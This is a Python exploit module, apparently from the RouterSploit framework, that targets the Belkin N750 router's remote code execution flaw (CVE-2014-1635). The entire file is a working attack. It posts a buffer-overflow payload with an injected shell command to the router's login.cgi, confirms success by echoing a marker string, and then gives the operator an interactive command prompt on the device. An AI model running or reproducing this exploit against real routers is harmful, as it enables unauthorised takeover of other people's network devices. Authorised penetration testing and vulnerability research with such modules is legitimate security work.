import requests

from routersploit import (
    exploits,
    print_success,
    print_status,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for Belkin N750 Remote Code Execution vulnerability.
    If the target is vulnerable, command prompt is invoked.
    """
    __info__ = {
        'name': 'Belkin N750 RCE',
        'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.',
        'authors': [
            'Marco Vaz <mv[at]integrity.pt>',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635',
            'https://www.exploit-db.com/exploits/35184/',
            'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/',
        ],
        'targets': [
            'Belkin N750',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
    port = exploits.Option(80, 'Target Port')

    def run(self):
        if self.check() is True:
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
        else:
            print_error("Target is not vulnerable")

    def command_loop(self):
        while 1:
            cmd = raw_input("cmd > ")
            print self.execute(cmd)

    def execute(self, cmd):
        url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
        data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)

        try:
            r = requests.post(url, headers=headers, data=data, verify=False)
            res = r.text
        except requests.exceptions.MissingSchema:
            return "Invalid URL format: %s" % url
        except requests.exceptions.ConnectionError:
            return "Connection error: %s" % url

        return res

    def check(self):
        # todo random mark
        url = sanitize_url("{}:{}/login.cgi".format(self.target, self.port))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
        data = "GO=&jump=" + "A" * 1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"

        try:
            r = requests.post(url, headers=headers, data=data, verify=False)
            res = r.text
        except:
            return None  # could not verify

        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
            return True  # target vulnerable

        return False  # target is not vulnerable
